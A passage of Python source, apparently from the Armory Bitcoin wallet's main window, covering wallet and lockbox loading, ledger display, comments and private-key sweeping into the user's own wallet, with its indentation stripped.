self.bringArmoryToFront()
return self.uriSendBitcoins(uriDict)
#############################################################################
def loadWalletsAndSettings(self, updateProgress):
LOGINFO('loadWalletsAndSettings')
self.getSettingOrSetDefault('First_Load', True)
self.getSettingOrSetDefault('Load_Count', 0)
self.getSettingOrSetDefault('User_Mode', 'Advanced')
self.getSettingOrSetDefault('UnlockTimeout', 10)
self.getSettingOrSetDefault('DNAA_UnlockTimeout', False)
# Determine if we need to do new-user operations, increment load-count
self.firstLoad = False
if self.getSettingOrSetDefault('First_Load', True):
self.firstLoad = True
self.writeSetting('First_Load', False)
self.writeSetting('First_Load_Date', long(RightNow()))
self.writeSetting('Load_Count', 1)
self.writeSetting('AdvFeature_UseCt', 0)
else:
self.writeSetting('Load_Count', (self.settings.get('Load_Count')+1) % 100)
# Set the usermode, default to standard
self.usermode = USERMODE.Standard
if self.settings.get('User_Mode') == 'Advanced':
self.usermode = USERMODE.Advanced
elif self.settings.get('User_Mode') == 'Expert':
self.usermode = USERMODE.Expert
# Set the language, default to English
self.language = 'en'
if self.settings.get('Language') != '':
self.language = self.settings.get('Language')
# The user may have asked to never be notified of a particular
# notification again. We have a short-term list (wiped on every
# load), and a long-term list (saved in settings). We simply
# initialize the short-term list with the long-term list, and add
# short-term ignore requests to it
notifyStr = self.getSettingOrSetDefault('NotifyIgnore', '')
nsz = len(notifyStr)
self.notifyIgnoreLong = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
self.notifyIgnoreShort = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
# Load wallets found in the .armory directory
self.walletMap = {}
self.walletIndices = {}
self.walletIDSet = set()
self.walletManager = None
# I need some linear lists for accessing by index
self.walletIDList = []
self.walletVisibleList = []
self.wltIDList = []
self.combinedLedger = []
self.ledgerSize = 0
self.ledgerTable = []
self.walletSideScanProgress = {}
LOGINFO('Loading wallets...')
wltPaths = readWalletFiles()
wltExclude = self.settings.get('Excluded_Wallets', expectList=True)
ratioPerWallet = 0
if len(wltPaths) > 0:
ratioPerWallet = 100 / float(len(wltPaths))
i = 0
for fpath in wltPaths:
currentProgress = float(i) * ratioPerWallet
updateProgress(currentProgress)
i += 1
def reportProgress(val):
updateProgress(currentProgress + val*ratioPerWallet
)
try:
wltLoad = PyBtcWallet().readWalletFile(fpath, \
reportProgress=reportProgress)
wltID = wltLoad.uniqueIDB58
if fpath in wltExclude or wltID in wltExclude:
continue
wltLoaded = True
if wltID in self.walletIDSet:
LOGWARN('***WARNING: Duplicate wallet detected, %s', wltID)
wo1 = self.walletMap[wltID].watchingOnly
wo2 = wltLoad.watchingOnly
if wo1 and not wo2:
prevWltPath = self.walletMap[wltID].walletPath
self.walletMap[wltID] = wltLoad
LOGWARN('First wallet is more useful than the second one...')
LOGWARN(' Wallet 1 (loaded): %s', fpath)
LOGWARN(' Wallet 2 (skipped): %s', prevWltPath)
else:
wltLoaded = False
LOGWARN('Second wallet is more useful than the first one...')
LOGWARN(' Wallet 1 (skipped): %s', fpath)
LOGWARN(' Wallet 2 (loaded): %s', self.walletMap[wltID].walletPath)
else:
# Update the maps/dictionaries
self.walletMap[wltID] = wltLoad
self.walletIndices[wltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(wltID)
self.walletIDList.append(wltID)
wtype = determineWalletType(wltLoad, self)[0]
notWatch = (not wtype == WLTTYPES.WatchOnly)
defaultVisible = self.getWltSetting(wltID, 'LedgerShow', notWatch)
self.walletVisibleList.append(defaultVisible)
wltLoad.mainWnd = self
if wltLoaded is False:
continue
except:
LOGEXCEPT( '***WARNING: Wallet could not be loaded: %s (skipping)',
fpath)
#raise
LOGINFO('Number of wallets read in: %d', len(self.walletMap))
for wltID, wlt in self.walletMap.iteritems():
dispStr = (' Wallet (%s):' % wlt.uniqueIDB58).ljust(25)
dispStr += '"'+wlt.labelName.ljust(32)+'" '
dispStr += '(Encrypted)' if wlt.useEncryption else '(No Encryption)'
LOGINFO(dispStr)
# Create one wallet per lockbox to make sure we can query individual
# lockbox histories easily.
if self.usermode==USERMODE.Expert:
LOGINFO('Loading Multisig Lockboxes')
self.loadLockboxesFromFile(MULTISIG_FILE)
# Get the last directory
savedDir = self.settings.get('LastDirectory')
if len(savedDir)==0 or not os.path.exists(savedDir):
savedDir = ARMORY_HOME_DIR
self.lastDirectory = savedDir
self.writeSetting('LastDirectory', savedDir)
updateProgress(100)
self.loadCppWallets()
#############################################################################
def loadCppWallets(self):
#load all existing cpp wallets
if self.walletManager == None:
self.walletManager = Cpp.WalletManager(str(ARMORY_HOME_DIR))
#check python wallets against cpp wallets
from ui.WalletMirrorDialog import WalletComparisonClass
wltCmpObj = WalletComparisonClass(self)
wltCmpObj.checkWallets()
#load all cpp wallets
for wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.cppWallet = self.walletManager.getCppWallet(wltID)
#############################################################################
@RemoveRepeatingExtensions
def getFileSave(self, title='Save Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultFilename=None):
LOGDEBUG('getFileSave')
startPath = self.settings.get('LastDirectory')
if len(startPath)==0 or not os.path.exists(startPath):
startPath = ARMORY_HOME_DIR
if not defaultFilename==None:
startPath = os.path.join(startPath, defaultFilename)
types = ffilter
types.append('All files (*)')
typesStr = ';; '.join(str(_type) for _type in types)
# Open the native file save dialog and grab the saved file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr))
else:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr,
options=QFileDialog.DontUseNativeDialog))
fdir,fname = os.path.split(fullPath)
if fdir:
self.writeSetting('LastDirectory', fdir)
return fullPath
#############################################################################
def getFileLoad(self, title='Load Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultDir=None):
LOGDEBUG('getFileLoad')
if defaultDir is None:
defaultDir = self.settings.get('LastDirectory')
if len(defaultDir)==0 or not os.path.exists(defaultDir):
defaultDir = ARMORY_HOME_DIR
types = list(ffilter)
types.append(self.tr('All files (*)'))
typeStr = QString("")
for i in range(0, len(types)):
_type = types[i]
typeStr += QString(_type)
if i < len(types) - 1:
typeStr += QString(";; ")
# Open the native file load dialog and grab the loaded file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typeStr))
else:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typeStr,
options=QFileDialog.DontUseNativeDialog))
self.writeSetting('LastDirectory', os.path.split(fullPath)[0])
return fullPath
##############################################################################
def getWltSetting(self, wltID, propName, defaultValue=''):
# Sometimes we need to settings specific to individual wallets -- we will
# prefix the settings name with the wltID.
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
if self.settings.hasSetting(wltPropName):
return self.settings.get(wltPropName)
else:
if not defaultValue=='':
self.setWltSetting(wltID, propName, defaultValue)
return defaultValue
#############################################################################
def setWltSetting(self, wltID, propName, value):
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
self.writeSetting(wltPropName, value)
#############################################################################
def toggleIsMine(self, wltID):
alreadyMine = self.getWltSetting(wltID, 'IsMine')
if alreadyMine:
self.setWltSetting(wltID, 'IsMine', False)
else:
self.setWltSetting(wltID, 'IsMine', True)
#############################################################################
def loadLockboxesFromFile(self, fn):
self.allLockboxes = []
self.cppLockboxWltMap = {}
if not os.path.exists(fn):
return
lbList = readLockboxesFile(fn)
for lb in lbList:
self.updateOrAddLockbox(lb)
#############################################################################
def updateOrAddLockbox(self, lbObj, isFresh=False):
try:
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
# Add new lockbox to list
self.allLockboxes.append(lbObj)
self.lockboxIDMap[lbID] = len(self.allLockboxes)-1
else:
# Replace the original
self.allLockboxes[index] = lbObj
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
except:
LOGEXCEPT('Failed to add/update lockbox')
#############################################################################
def removeLockbox(self, lbObj):
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
LOGERROR('Tried to remove lockbox that DNE: %s', lbID)
else:
del self.allLockboxes[index]
self.reconstructLockboxMaps()
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
#############################################################################
def reconstructLockboxMaps(self):
self.lockboxIDMap.clear()
for i,box in enumerate(self.allLockboxes):
self.lockboxIDMap[box.uniqueIDB58] = i
#############################################################################
def getLockboxByID(self, boxID):
index = self.lockboxIDMap.get(boxID)
return None if index is None else self.allLockboxes[index]
################################################################################
# Get the lock box ID if the p2shAddrString is found in one of the lockboxes
# otherwise it returns None
def getLockboxByP2SHAddrStr(self, p2shAddrStr):
for lboxId in self.lockboxIDMap.keys():
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
if lbox.hasScrAddr(p2shAddrStr):
return lbox
return None
#############################################################################
def browseLockboxes(self):
self.lbDialog = DlgLockboxManager(self, self)
self.lbDialog.exec_()
self.lblDialog = None
#############################################################################
def getContribStr(self, binScript, contribID='', contribLabel=''):
"""
This is used to display info for the lockbox interface. It might also be
useful as a general script_to_user_string method, where you have a
binScript and you want to tell the user something about it. However,
it is verbose, so it won't fit in a send-confirm dialog, necessarily.
We should extract as much information as possible without contrib*. This
at least guarantees that we see the correct data for our own wallets
and lockboxes, even if the data for other parties is incorrect.
"""
displayInfo = self.getDisplayStringForScript(binScript, 60, 2)
if displayInfo['WltID'] is not None:
return displayInfo['String'], ('WLT:%s' % displayInfo['WltID'])
elif displayInfo['LboxID'] is not None:
return displayInfo['String'], ('LB:%s' % displayInfo['LboxID'])
scriptType = getTxOutScriptType(binScript)
# At this point, we can use the contrib ID (and know we can't sign it)
if contribID or contribLabel:
if contribID:
if contribLabel:
outStr = self.tr('Contributor "%1" (%2)').arg(contribLabel, contribID)
else:
outStr = self.tr('Contributor %1').arg(contribID)
else:
if contribLabel:
outStr = self.tr('Contributor "%1"').arg(contribLabel)
else:
outStr = self.tr('Unknown Contributor')
LOGERROR('How did we get to this impossible else-statement?')
return outStr, ('CID:%s' % contribID)
# If no contrib ID, then salvage anything
astr = displayInfo['AddrStr']
cid = None
if scriptType == CPP_TXOUT_MULTISIG:
M,N,a160s,pubs = getMultisigScriptInfo(binScript)
dispStr = 'Unrecognized Multisig %d-of-%d: P2SH=%s' % (M,N,astr)
cid = 'MS:%s' % astr
elif scriptType == CPP_TXOUT_P2SH:
dispStr = 'Unrecognized P2SH: %s' % astr
cid = 'P2SH:%s' % astr
elif scriptType in CPP_TXOUT_HAS_ADDRSTR:
dispStr = 'Address: %s' % astr
cid = 'ADDR:%s' % astr
else:
dispStr = 'Non-standard: P2SH=%s' % astr
cid = 'NS:%s' % astr
return dispStr, cid
#############################################################################
def getWalletForAddr160(self, addr160):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasScrAddr(addr160):
return wltID
return ''
#############################################################################
def getWalletForScrAddr(self, scrAddr):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasScrAddr(scrAddr):
return wltID
return ''
#############################################################################
def getSettingOrSetDefault(self, settingName, defaultVal):
s = self.settings.getSettingOrSetDefault(settingName, defaultVal)
return s
#############################################################################
def writeSetting(self, settingName, val):
self.settings.set(settingName, val)
# NB: armoryd has a similar function (Armory_Daemon::start()), and both share
# common functionality in ArmoryUtils (finishLoadBlockchainCommon). If you
# mod this function, please be mindful of what goes where, and make sure
# any critical functionality makes it into armoryd.
def finishLoadBlockchainGUI(self):
# Let's populate the wallet info after finishing loading the blockchain.
self.setDashboardDetails()
self.memPoolInit = True
self.createCombinedLedger()
self.ledgerSize = len(self.combinedLedger)
self.statusBar().showMessage(self.tr('Blockchain loaded, wallets sync\'d!'), 10000)
currSyncSuccess = self.getSettingOrSetDefault("SyncSuccessCount", 0)
self.writeSetting('SyncSuccessCount', min(currSyncSuccess+1, 10))
if self.getSettingOrSetDefault('NotifyBlkFinish',True):
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Info,
self.tr('Blockchain Loaded!'), self.tr('Blockchain loading is complete. '
'Your balances and transaction history are now available '
'under the "Transactions" tab. You can also send and '
'receive bitcoins.'), dnaaMsg=self.tr('Do not show me this notification again '), yesStr='OK')
if remember==True:
self.writeSetting('NotifyBlkFinish',False)
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Ledger)
self.netMode = NETWORKMODE.Full
self.settings.set('FailedLoadCount', 0)
# This will force the table to refresh with new data
self.removeBootstrapDat() # if we got here, we're *really* done with it
self.walletModel.reset()
qLen = self.delayedURIData['qLen']
if qLen > 0:
#delayed URI parses, feed them back to the uri parser now
for i in range(0, qLen):
uriStr = self.delayedURIData[qLen-i-1]
self.delayedURIData['qLen'] = qLen -i -1
self.uriLinkClicked(uriStr)
#############################################################################
def removeBootstrapDat(self):
bfile = os.path.join(BTC_HOME_DIR, 'bootstrap.dat.old')
if os.path.exists(bfile):
os.remove(bfile)
#############################################################################
def changeLedgerSorting(self, col, order):
"""
The direct sorting was implemented to avoid having to search for comment
information for every ledger entry. Therefore, you can't sort by comments
without getting them first, which is the original problem to avoid.
"""
if col in (LEDGERCOLS.NumConf, LEDGERCOLS.DateStr, \
LEDGERCOLS.Comment, LEDGERCOLS.Amount, LEDGERCOLS.WltName):
self.sortLedgCol = col
self.sortLedgOrder = order
self.createCombinedLedger()
#############################################################################
def createCombinedLedger(self, resetMainLedger=False):
"""
Create a ledger to display on the main screen, that consists of ledger
entries of any SUBSET of available wallets.
"""
bdmState = TheBDM.getState()
self.combinedLedger = []
totalFunds = 0
spendFunds = 0
unconfFunds = 0
if bdmState == BDM_BLOCKCHAIN_READY:
for wltID in self.wltIDList:
wlt = self.walletMap[wltID]
totalFunds += wlt.getBalance('Total')
spendFunds += wlt.getBalance('Spendable')
unconfFunds += wlt.getBalance('Unconfirmed')
self.ledgerSize = len(self.combinedLedger)
# Many MainWindow objects haven't been created yet...
# let's try to update them and fail silently if they don't exist
try:
if bdmState in (BDM_OFFLINE, BDM_SCANNING):
self.lblTotalFunds.setText( '-'*12 )
self.lblSpendFunds.setText( '-'*12 )
self.lblUnconfFunds.setText('-'*12 )
return
uncolor = htmlColor('MoneyNeg') if unconfFunds>0 else htmlColor('Foreground')
btccolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('MoneyPos')
lblcolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('Foreground')
goodColor= htmlColor('TextGreen')
self.lblTotalFunds.setText('<b><font color="%s">%s</font></b>' % (btccolor,coin2str(totalFunds)))
self.lblTot.setText(self.tr('<b><font color="%1">Maximum Funds:</font></b>').arg(lblcolor))
self.lblBTC1.setText('<b><font color="%s">BTC</font></b>' % lblcolor)
self.lblSpendFunds.setText('<b><font color=%s>%s</font></b>' % (goodColor, coin2str(spendFunds)))
self.lblUnconfFunds.setText(('<b><font color="%s">%s</font></b>' % \
(uncolor, coin2str(unconfFunds))))
if resetMainLedger == False:
self.ledgerModel.reset()
else:
self.ledgerView.goToTop()
except AttributeError:
raise
if not self.usermode==USERMODE.Expert:
return
# In expert mode, we're updating the lockbox info, too
try:
self.lockboxLedgModel.reset()
except:
LOGEXCEPT('Failed to update lockbox ledger')
#############################################################################
def getCommentForLockboxTx(self, lboxId, le):
commentSet = set([])
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
for a160 in lbox.a160List:
wltID = self.getWalletForAddr160(a160)
if wltID:
commentSet.add(self.walletMap[wltID].getCommentForLE(le))
return ' '.join(commentSet)
#############################################################################
def convertLedgerToTable(self, ledger, showSentToSelfAmt=True, wltIDIn=None):
table2D = []
datefmt = self.getPreferredDateFormat()
for le in ledger:
if wltIDIn is None:
wltID = le.getWalletID()
else:
wltID = wltIDIn
row = []
wlt = self.walletMap.get(wltID)
if wlt:
isWatch = (determineWalletType(wlt, self)[0] == WLTTYPES.WatchOnly)
wltName = wlt.labelName
dispComment = self.getCommentForLE(le, wltID)
else:
lboxId = wltID
lbox = self.getLockboxByID(lboxId)
if not lbox:
continue
isWatch = True
wltName = '%s-of-%s: %s (%s)' % (lbox.M, lbox.N, lbox.shortName, lboxId)
dispComment = self.getCommentForLockboxTx(lboxId, le)
nConf = TheBDM.getTopBlockHeight() - le.getBlockNum()+1
if le.getBlockNum()>=0xffffffff:
nConf=0
# If this was sent-to-self... we should display the actual specified
# value when the transaction was executed. This is pretty difficult
# when both "recipient" and "change" are indistinguishable... but
# They're actually not because we ALWAYS generate a new address to
# for change , which means the change address MUST have a higher
# chain index
amt = le.getValue()
#if le.isSentToSelf() and wlt and showSentToSelfAmt:
#amt = determineSentToSelfAmt(le, wlt)[0]
# NumConf
row.append(nConf)
# UnixTime (needed for sorting)
row.append(le.getTxTime())
# Date
row.append(unixTimeToFormatStr(le.getTxTime(), datefmt))
# TxDir (actually just the amt... use the sign of the amt to determine dir)
row.append(coin2str(le.getValue(), maxZeros=2))
# Wlt Name
row.append(wltName)
# Comment
if le.isOptInRBF() == True:
if le.getValue() < 0 or le.isSentToSelf():
dispComment = self.tr("*Right click to bump fee* ") + dispComment
else:
dispComment = self.tr("*** RBF Flagged *** ") + dispComment
elif le.isChainedZC() == True:
dispComment = self.tr("*** Chained ZC *** ") + dispComment
row.append(dispComment)
# Amount
row.append(coin2str(amt, maxZeros=2))
# Is this money mine?
row.append(isWatch)
# ID to display (this might be the lockbox ID)
row.append( wltID )
# TxHash
row.append( binary_to_hex(le.getTxHash() ))
# Is this a coinbase/generation transaction
row.append( le.isCoinbase() )
# Sent-to-self
row.append( le.isSentToSelf() )
# RBF and zc chain status
row.append( le.isOptInRBF() )
row.append(le.isChainedZC())
# Finally, attach the row to the table
table2D.append(row)
return table2D
#############################################################################
def walletListChanged(self):
self.walletModel.reset()
self.populateLedgerComboBox()
self.changeWltFilter()
#############################################################################
def populateLedgerComboBox(self):
try:
comboIdx = self.comboWltSelect.currentIndex()
if comboIdx < 0:
raise
except:
comboIdx = self.getSettingOrSetDefault('LastFilterState', 0)
self.comboWltSelect.clear()
self.comboWltSelect.addItem( self.tr('My Wallets' ))
self.comboWltSelect.addItem( self.tr('Offline Wallets' ))
self.comboWltSelect.addItem( self.tr('Other\'s wallets' ))
self.comboWltSelect.addItem( self.tr('All Wallets' ))
self.comboWltSelect.addItem( self.tr('Custom Filter' ))
for wltID in self.walletIDList:
self.comboWltSelect.addItem( self.walletMap[wltID].labelName )
self.comboWltSelect.insertSeparator(5)
self.comboWltSelect.insertSeparator(5)
self.comboWltSelect.setCurrentIndex(comboIdx)
#############################################################################
def execDlgWalletDetails(self, index=None):
if len(self.walletMap)==0:
reply = QMessageBox.information(self, self.tr('No Wallets!'),
self.tr('You currently do not have any wallets. Would you like to '
'create one, now?'), QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
if index==None:
index = self.walletsView.selectedIndexes()
if len(self.walletMap)==1:
self.walletsView.selectRow(0)
index = self.walletsView.selectedIndexes()
elif len(index)==0:
QMessageBox.warning(self, self.tr('Select a Wallet'), \
self.tr('Please select a wallet on the right, to see its properties.'), QMessageBox.Ok)
return
index = index[0]
wlt = self.walletMap[self.walletIDList[index.row()]]
dialog = DlgWalletDetails(wlt, self.usermode, self, self)
self.walletDialogDict[wlt.uniqueIDB58] = dialog
dialog.exec_()
if wlt.uniqueIDB58 in self.walletDialogDict:
del self.walletDialogDict[wlt.uniqueIDB58]
#############################################################################
def execClickRow(self, index=None):
row,col = index.row(), index.column()
if not col==WLTVIEWCOLS.Visible:
return
wltID = self.walletIDList[row]
currEye = self.walletVisibleList[row]
self.walletVisibleList[row] = not currEye
self.setWltSetting(wltID, 'LedgerShow', not currEye)
if TheBDM.getState()==BDM_BLOCKCHAIN_READY:
self.changeWltFilter()
#############################################################################
def updateTxCommentFromView(self, view):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, LEDGERCOLS.Comment).data().toString())
wltID = str(view.model().index(row, LEDGERCOLS.WltID ).data().toString())
txHash = str(view.model().index(row, LEDGERCOLS.TxHash ).data().toString())
if not currComment:
dialog = DlgSetComment(self, self, currComment, self.tr('Add Transaction Comment'))
else:
dialog = DlgSetComment(self, self, currComment, self.tr('Change Transaction Comment'))
if dialog.exec_():
newComment = str(dialog.edtComment.text())
view.model().updateIndexComment(index, newComment)
self.walletMap[wltID].setComment(hex_to_binary(txHash), newComment)
self.walletListChanged()
#############################################################################
def updateAddressCommentFromView(self, view, wlt):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, ADDRESSCOLS.Comment).data().toString())
addrStr = str(view.model().index(row, ADDRESSCOLS.Address).data().toString())
if not currComment:
dialog = DlgSetComment(self, self, currComment, self.tr('Add Address Comment'))
else:
dialog = DlgSetComment(self, self, currComment, self.tr('Change Address Comment'))
if dialog.exec_():
newComment = str(dialog.edtComment.text())
atype, addr160 = addrStr_to_hash160(addrStr)
if atype==P2SHBYTE:
LOGWARN('Setting comment for P2SH address: %s' % addrStr)
wlt.setComment(addr160, newComment)
#############################################################################
def getAddrCommentIfAvailAll(self, txHash):
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
return ''
else:
appendedComments = []
for wltID,wlt in self.walletMap.iteritems():
cmt = wlt.getAddrCommentIfAvail(txHash)
if len(cmt)>0:
appendedComments.append(cmt)
return '; '.join(appendedComments)
#############################################################################
def getCommentForLE(self, le, wltID=None):
# Smart comments for LedgerEntry objects: get any direct comments ...
# if none, then grab the one for any associated addresses.
if wltID is None:
wltID = le.getWalletID()
return self.walletMap[wltID].getCommentForLE(le)
#############################################################################
def addWalletToApplication(self, newWallet, walletIsNew=False):
LOGINFO('addWalletToApplication')
# Update the maps/dictionaries
newWltID = newWallet.uniqueIDB58
if self.walletMap.has_key(newWltID):
return
self.walletMap[newWltID] = newWallet
self.walletIndices[newWltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(newWltID)
self.walletIDList.append(newWltID)
self.loadCppWallets()
newWallet.registerWallet(walletIsNew)
showByDefault = (determineWalletType(newWallet, self)[0] != WLTTYPES.WatchOnly)
self.walletVisibleList.append(showByDefault)
self.setWltSetting(newWltID, 'LedgerShow', showByDefault)
self.walletListChanged()
self.mainWnd = self
#############################################################################
def removeWalletFromApplication(self, wltID):
LOGINFO('removeWalletFromApplication')
idx = -1
try:
idx = self.walletIndices[wltID]
except KeyError:
LOGERROR('Invalid wallet ID passed to "removeWalletFromApplication"')
raise WalletExistsError
#self.walletMap[wltID].unregisterWallet()
del self.walletMap[wltID]
del self.walletIndices[wltID]
self.walletIDSet.remove(wltID)
del self.walletIDList[idx]
del self.walletVisibleList[idx]
# Reconstruct walletIndices
for i,wltID in enumerate(self.walletIDList):
self.walletIndices[wltID] = i
self.walletListChanged()
#############################################################################
def RecoverWallet(self):
DlgWltRecoverWallet(self, self).promptWalletRecovery()
#############################################################################
def createSweepAddrTx(self, sweepFromAddrObjList, sweepToScript):
"""
This method takes a list of addresses (likely just created from private
key data), finds all their unspent TxOuts, and creates a signed tx that
transfers 100% of the funds to the sweepTO160 address. It doesn't
actually execute the transaction, but it will return a broadcast-ready
PyTx object that the user can confirm. TxFee is automatically calc'd
and deducted from the output value, if necessary.
"""
LOGINFO('createSweepAddrTx')
if not isinstance(sweepFromAddrObjList, (list, tuple)):
sweepFromAddrObjList = [sweepFromAddrObjList]
addr160List = [a.getAddr160() for a in sweepFromAddrObjList]
utxoList = getUnspentTxOutsForAddr160List(addr160List)
if len(utxoList)==0:
return [None, 0, 0]
outValue = sumTxOutList(utxoList)
inputSide = []
for utxo in utxoList:
# The PyCreateAndSignTx method require PyTx and PyBtcAddress objects
rawTx = TheBDM.bdv().getTxByHash(utxo.getTxHash()).serialize()
a160 = CheckHash160(utxo.getRecipientScrAddr())
for aobj in sweepFromAddrObjList:
if a160 == aobj.getAddr160():
pubKey = aobj.binPublicKey65.toBinStr()
pubKeyMap = {}
pubKeyMap[ADDRBYTE + a160] = pubKey
txoIdx = utxo.getTxOutIndex()
inputSide.append(UnsignedTxInput(rawTx, txoIdx, None, pubKeyMap))
break
minFee = calcMinSuggestedFees(utxoList, outValue, 0, 1)
if minFee > 0:
LOGDEBUG( 'Subtracting fee from Sweep-output')
outValue -= minFee
if outValue<=0:
return [None, outValue, minFee]
# Creating the output list is pretty easy...
outputSide = []
outputSide.append(DecoratedTxOut(sweepToScript, outValue))
try:
# Make copies, destroy them in the finally clause
privKeyMap = {}
for addrObj in sweepFromAddrObjList:
scrAddr = ADDRBYTE + addrObj.getAddr160()
privKeyMap[scrAddr] = addrObj.binPrivKey32_Plain.copy()
pytx = PyCreateAndSignTx(inputSide, outputSide, privKeyMap)
return (pytx, outValue, minFee)
finally:
for scraddr in privKeyMap:
privKeyMap[scraddr].destroy()
#############################################################################
def confirmSweepScan(self, pybtcaddrList, targAddr160):
LOGINFO('confirmSweepScan')
gt1 = len(self.sweepAfterScanList)>1
if len(self.sweepAfterScanList) > 0:
QMessageBox.critical(self, self.tr('Already Sweeping'),
self.tr('You are already in the process of scanning the blockchain for '
'the purposes of sweeping other addresses. You cannot initiate '
'sweeping new addresses until the current operation completes. '
'<br><br>'
'In the future, you may select "Multiple Keys" when entering '
'addresses to sweep. There is no limit on the number that can be '
'specified, but they must all be entered at once.'), QMessageBox.Ok)
# Destroy the private key data
for addr in pybtcaddrList:
addr.binPrivKey32_Plain.destroy()
return False
confirmed=False
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
#LOGERROR('Somehow ended up at confirm-sweep while in offline mode')
#QMessageBox.info(self, 'Armory is Offline', \
#'Armory is currently in offline mode. You must be in online '
#'mode to initiate the sweep operation.')
nkey = len(self.sweepAfterScanList)
strPlur = self.tr('addresses') if nkey>1 else self.tr('address')
QMessageBox.info(self, self.tr('Armory is Offline'), \
self.tr('You have chosen to sweep %n key(s), but Armory is currently '
'in offline mode. The sweep will be performed the next time you '
'go into online mode. You can initiate online mode (if available) '
'from the dashboard in the main window.', "", nkey), QMessageBox.Ok)
confirmed=True
else:
msgConfirm = ( \
self.tr('Armory must scan the global transaction history in order to '
'find any bitcoins associated with the keys you supplied. '
'Armory will go into offline mode temporarily while the scan '
'is performed, and you will not have access to balances or be '
'able to create transactions. The scan may take several minutes.'
'<br><br>', "", len(self.sweepAfterScanList)))
if TheBDM.getState()==BDM_SCANNING:
msgConfirm += ( \
self.tr('There is currently another scan operation being performed. '
'Would you like to start the sweep operation after it completes? '))
elif TheBDM.getState()==BDM_BLOCKCHAIN_READY:
msgConfirm += ( \
self.tr('<b>Would you like to start the scan operation right now?</b>'))
msgConfirm += (self.tr('<br><br>Clicking "No" will abort the sweep operation'))
confirmed = QMessageBox.question(self, self.tr('Confirm Rescan'), msgConfirm, \
QMessageBox.Yes | QMessageBox.No)
if confirmed==QMessageBox.Yes:
for addr in pybtcaddrList:
TheBDM.registerImportedScrAddr(Hash160ToScrAddr(addr.getAddr160()))
self.sweepAfterScanList = pybtcaddrList
self.sweepAfterScanTarg = targAddr160
self.setDashboardDetails()
return True
#############################################################################
def finishSweepScan(self, wlt, sweepList, sweepAfterScanTarget):
LOGINFO('finishSweepScan')
self.sweepAfterScanList = []
#######################################################################
# The createSweepTx method will return instantly because the blockchain
# has already been rescanned, as described above
targScript = scrAddr_to_script(ADDRBYTE + sweepAfterScanTarget)
finishedTx, outVal, fee = self.createSweepAddrTx(sweepList, targScript)
gt1 = len(sweepList)>1
if finishedTx==None:
if (outVal,fee)==(0,0):
QMessageBox.critical(self, self.tr('Nothing to do'), \
self.tr('The private key(s) you have provided does not appear to contain '
'any funds. There is nothing to sweep.', "", len(sweepList)), \
QMessageBox.Ok)
return
else:
pladdr = (self.tr('addresses') if gt1 else self.tr('address'))
QMessageBox.critical(self, self.tr('Cannot sweep'),\
self.tr('You cannot sweep the funds from the address(es) you specified because '
'the transaction fee would be greater than or equal to the amount '
'swept. '
'<br><br> '
'<b>Balance of address(es):</b> %1<br> '
'<b>Fee to sweep address(es):</b> %2 '
'<br><br>The sweep operation has been canceled.', "", len(sweepList)).arg(coin2str(outVal+fee,maxZeros=0), coin2str(fee,maxZeros=0)), \
QMessageBox.Ok)
LOGERROR('Sweep amount (%s) is less than fee needed for sweeping (%s)', \
coin2str(outVal+fee, maxZeros=0), coin2str(fee, maxZeros=0))
return
# Finally, if we got here, we're ready to broadcast!
if gt1:
dispIn = self.tr('multiple addresses')
else:
addrStr = hash160_to_addrStr(sweepList[0].getAddr160())
dispIn = self.tr('address <b>%1</b>').arg(addrStr)
dispOut = self.tr('wallet <b>"%1"</b> (%2) ').arg(wlt.labelName, wlt.uniqueIDB58)
if DlgVerifySweep(dispIn, dispOut, outVal, fee).exec_():
self.broadcastTransaction(finishedTx, dryRun=False)
#############################################################################
def notifyNewZeroConf(self, leVec):
'''
Function that looks at an incoming zero-confirmation transaction queue and
determines if any incoming transactions were created by Armory. If so, the
transaction will be passed along to a user notification queue.
'''
vlen = leVec.size()
for i in range(0, vlen):
notifyIn = self.getSettingOrSetDefault('NotifyBtcIn', \
not OS_MACOSX)
notifyOut = self.getSettingOrSetDefault('NotifyBtcOut', \
not OS_MACOSX)
le = leVec[i]
if (le.getValue() <= 0 and notifyOut) or \
(le.getValue() > 0 and notifyIn):
self.notifyQueue.append([le.getWalletID(), le, False])
self.doTheSystemTrayThing()
#############################################################################
def broadcastTransaction(self, pytx, dryRun=False):
